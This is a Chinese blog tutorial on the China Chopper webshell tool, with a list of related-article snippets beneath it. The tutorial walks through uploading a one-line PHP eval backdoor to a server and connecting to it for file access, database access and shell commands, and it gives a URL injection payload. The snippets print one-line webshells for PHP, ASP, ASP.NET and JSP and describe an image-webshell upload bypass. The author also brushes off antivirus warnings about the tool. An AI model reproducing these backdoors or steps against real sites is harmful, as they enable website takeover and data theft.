菜刀php教程,中国菜刀(chopper)功能介绍及使用教程

最新推荐文章于 2024-05-14 00:16:35 发布
最新推荐文章于 2024-05-14 00:16:35 发布
阅读量5.6k 收藏 24
点赞数 4
文章标签: 菜刀php教程

中国菜刀(下载地址:)是一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。

注:单独的菜刀没有效果,需要服务器端有一句话后门,或漏洞,例如这样的

:89/mingfang/index.php?q=${${@eval%28$_POST[cmd]%29}}

配置图:

95174e3dd634804786c4c5f14ed68abb.gif

1.中国菜刀支持的服务端脚本:PHP、ASP、asp.net;

2.主要功能有:文件管理(有足够的权限时候可以管理整个磁盘/文件系统),数据库管理,虚拟终端。

3.菜刀的工作原理是:利用上传到服务器的一句话脚本再通过一些添加配置就可以工作了。

今天我只介绍PHP的方法(其他的大同小异)。

首先:我们首先要新建一个php文件,文件名随意取,然后写入一句代码:

;eval()这个函数大家并不陌生吧,就是把里面的字符串作为PHP代码执行。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。如下图:

58d160552d1e46ddae0891bdba3cc159.png

第二步:打开菜刀这个软件,进入如下界面,右键点击“添加”;如下图:

121b3fed6cf05ded69e4fa4891f0157a.png

第三步:此时会弹出一个添加shell的对话框,由图一看出我的 “dxr.php”上传在站点根目录,所以这里的地址填为: 。地址后面的小框框里面的“ee”就是你的“口令”,也就是

这里的“ee”。下面配置项如果你知道用户名密码就填,不知道,不填,也不会影响文件管理和虚拟终端这两个功能,只是不能查看数据库了。

3317cd7f5865f7def40b2857b79b18e9.png

最后:点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!!

4aa6d8eec19fb60cb9b686306911e064.png

所以很多黑站者利用一些网站漏洞,上传一句话木马后,就基本上可以黑下你的站了。中国菜刀,就是这么强大!!

操作效果截图一:

9bffc4d9be2d2eed6de85dd2cbfb1eb1.png

操作效果截图二:

a66964d1860a190bbed14bedec0280c5.png

操作效果截图三:

357271a14d8428acbeefbbd56020869f.png

菜刀下载:

终于写完了,喜欢的话就支持一下哦,代潇瑞博客,专注于PHP学习!!

最后说明一下:此软件打开时杀毒软件可能会报毒的,我已经用了很多遍,反正都没事。如果你不相信的话,也就不用下载了,呵呵。

天才你meng哥
关注
  • 4
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
中国菜刀使用介绍
m0_37786014的博客
12-04 1720
一、简介 服务器只需要简单的一行代码,即可用此程序实现常用的管理功能功能代码二次编码后发送,过IDS的能力大幅提高。 目前支持的服务端脚本:PHP、ASP、.NET,并且支持、https安全连接的网站 在服务器端运行的代码如下: PHP:<?php @eval($_POST['pass'];?)> ASP:<%eval request("pass")%> ASP.NET:...
23个常见Webshell网站管理工具
weixin_54787877的博客
03-20 5240
注 文章来源:“潇湘信安”公众号 这篇文章笔者整理了目前所见到过的大部分Webshell网站管理工具,这里只对这些工具做了简单介绍,并没有写具体使用方式,大家如果有兴趣可以自己去看一下使用说明,同时也欢迎大家补充一些类似工具。 目前国内安全人员常用的有:中国菜刀中国蚁剑、冰蝎、哥斯拉、Metasploit、SharPyShell等,也有一些内部团队开发的类似工具,但是并没有对外公开。 (1) 中国菜刀Chopper中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚
中国菜刀的简单使用
abtgu的博客
04-08 3745
简介 说到菜刀,普通人肯定想到家里切菜的菜刀,而对于程序员来说,首先想到的却是一款功能强大的webshell管理工具。中国菜刀小巧实用,具有文件管理,数据库管理,虚拟终端等功能,支持PHP,ASP的服务端脚本。 简单使用 新建一个PHP文件,写入一句话<?php eval($_POST['a']);?>将这个文件上传到站点里。 打开菜刀,在空白处右键点击“添加”,按照图中指示进行填写...
2024年前端最新常用的WebShell管理工具(1),2024年最新网易严选面试经验
最新发布
2401_84619530的博客
05-14 348
我在成长过程中也是一路摸爬滚打,没有任何人的指点,所以走的很艰难。例如在大三的时候,如果有个学长可以阶段性的指点一二,如果有已经工作的师兄可以告诉我工作上需要什么,我应该前面的三年可以缩短一半;后来去面试bat,失败了有5、6次,每次也不知道具体是什么原因,都是靠面试回忆去猜测可能是哪方面的问题,回来学习和完善,当你真正去招人的时候,你就会知道面试记录是多么重要,面试官可以从面试记录里看到你的成长,总是去面试,总是没有成长,就会被定义为缺乏潜力。
中国菜刀使用教程
qq1140037586的博客
06-28 1442
中国菜刀使用教程
渗透利器 | 常见的WebShell管理工具
2201_75719295的博客
05-20 1056
攻击者在入侵网站时,通常要通过各种方式写入Webshell,从而获得服务器的控制权限,比如执行系统命令、读取配置文件、窃取用户数据,篡改网站页面等操作。 本文介绍十款常用的Webshell管理工具,以供你选择,你会选择哪一个?
【工具】中国菜刀 官方原版下载 官网下载链接
热门推荐
weixin_30429201的博客
04-13 1万+
首先,菜刀的官网是http://www.maicaidao.com,有很多冒充的注意分辨域名。 这种敏感工具必须下载官方的,非官方的菜刀都有后门,有兴趣可以搜一搜,妥妥的黑吃黑。 2.打开官网,发现貌似不是?是因为作者不是常年开放网站的,只是在新版本发布时开放几天,平时关着很正常。 3.那怎么下载呢?直接穿越回以前能下的时候下载就行了。这时你就应该想到了,查互联网档案:http://web....
中国菜刀的使用
xy_wjyjw的博客
10-27 150
中国菜刀实现与一句话木马联动:中国菜刀在本地(攻击机)。一句话木马在服务器(靶机)上。WebShell Manager管理工具。
Chopper_choppercircuit_chopper_
10-01
【标题】:“斩波器电路与斩波技术详解” 【正文】: 斩波器电路,又称开关稳压器,是电子工程领域中的一个重要概念,它主要用于电源转换和功率控制。在现代电力电子学中,斩波器电路扮演着至关重要的角色,尤其是...
dc-chopper-r.rar_chopper
07-14
DC chopper with r load
ca.zip_chopper model_full
09-20
MATLAB的Simulink环境提供了强大的仿真功能,允许我们进行各种条件下的仿真测试,比如不同负载条件、不同输入电压下的系统响应。 此外,模型还可能包含故障模拟和保护机制,如过电压和过电流保护,这些都是确保斩波...
dcdc.rar_chopper circuit_dcdc_matlab
09-15
标题中的“dcdc.rar_chopper circuit_dcdc_matlab”揭示了这个压缩包文件与DC-DC斩波电路的MATLAB仿真相关。DC-DC斩波器是一种电力转换装置,常用于电源管理和电压调节,尤其在电力电子技术领域广泛应用。MATLAB是一...
rezarezaii.zip_chopper_dc motor_dc motor chopper_zip
07-14
标题中的"rezarezaii.zip_chopper_dc motor_dc motor chopper_zip"暗示了这是一个关于直流电机斩波控制的压缩文件,其中可能包含了相关的模型或资料。"chopper"通常指的是斩波器,一种用于调节直流电机电压的电子...
【webshell管理工具之一】中国菜刀
redwand的博客
05-08 5616
写一个webshell的管理工具使用系列,以便于更好的理解和实战运用,先从大名鼎鼎的中国菜刀开始吧。
自学渗透第四天--中国菜刀
weixin_43710367的博客
05-12 1255
自学渗透第四天–中国菜刀 一、如何使用 中国菜刀的使用可利用网站的文件上传漏洞,通过一句话木马“<?php @eval($_POST['caidao']);?>”获取网站shell。本笔记使用的靶机是owasp。 (1)首先将一句话木马上传至网站后台。 (2)运行该文件,确认文件上传成功。 (3)复制该链接到中国菜刀,并输入相应的密码。 (4)成功获取网站shell。 二、常用功能 1、上传本地文件到网站后台。 2、下载在线文件至网站后台。 将欲下载的文件链接添加至下载框即可 由于某
中国菜刀使用与原理分析
weixin_45597678的博客
12-04 1万+
中国菜刀功能 中国菜刀的使用 原理分析
中国菜刀使用(实战正确姿势)
weixin_49071539的博客
12-17 9892
图片上传漏洞: ps:此教程为靶场实战,切勿用于非法用途 1. 准备制作图片马,随便找到一张图片重命名为1.jpg 2. 准备好一句话木马,这里我命名为1.php 3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg文件夹中会自动生成一个2.jpg文件。 4. 选择上传2.jpg 5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为.php,转发。 6. 可以看到上传
Kali Weevely工具使用详解 (php菜刀
董哥的黑板报
09-18 5439
一、下载与安装 如果是Kali低版本 百度云下载:https://pan.baidu.com/s/1XzkeuwHfa1S6Rkc5yTzjNg(提取码:3y3c) 下载之后解压,使用里面的weevely.py 如果是Kali高版本 Kali会自带该工具,无需下载 二、Weevely工具介绍 weevely是一款使用python编写的webshell工具(集webshel...
强劲的Web管理系统软件,中国菜刀chopper)的使用说明和实例教程
xhlylxhl的博客
08-29 2272
在服务器端运作的编码给出: PHP: ASP: <%eval request(“pass”)%> ASP.NET: <%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%> JSP:<%if(request.getParameter(“f”)!=null)(ne...
chopper放大器电路
01-16
chopper放大器电路是一种专门用于放大信号的电路。它的工作原理是将输入信号通过一个开关周期性地切割成脉冲形式,然后在输出端再将这些脉冲信号重新组合成原始信号的放大后的形式。 在这种电路中,通常会采用两个电压控制开关或者晶体管来实现切割和重新组合的功能。通过不断地开关这些开关,放大器可以将输入信号放大到所需的幅度,并输出给下游电路。 chopper放大器电路的优点之一是能够有效地抑制直流漂移和低频噪声,因此在测量和传感器应用中非常适用。另外,它还可以扩展放大器的带宽,并且能够实现较高的增益和低失真。 然而,chopper放大器电路也存在一些缺点,比如需要更复杂的电路结构和更高的功耗。同时,它对输入信号的频率和幅度也有一定的要求,如果输入信号的频率过高或者过大,可能会影响放大器的工作效果。 总的来说,chopper放大器电路是一种在特定应用场景下非常有用的放大器电路,它能够克服一些常规放大器的局限性,并且能够提供更高质量的信号放大。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值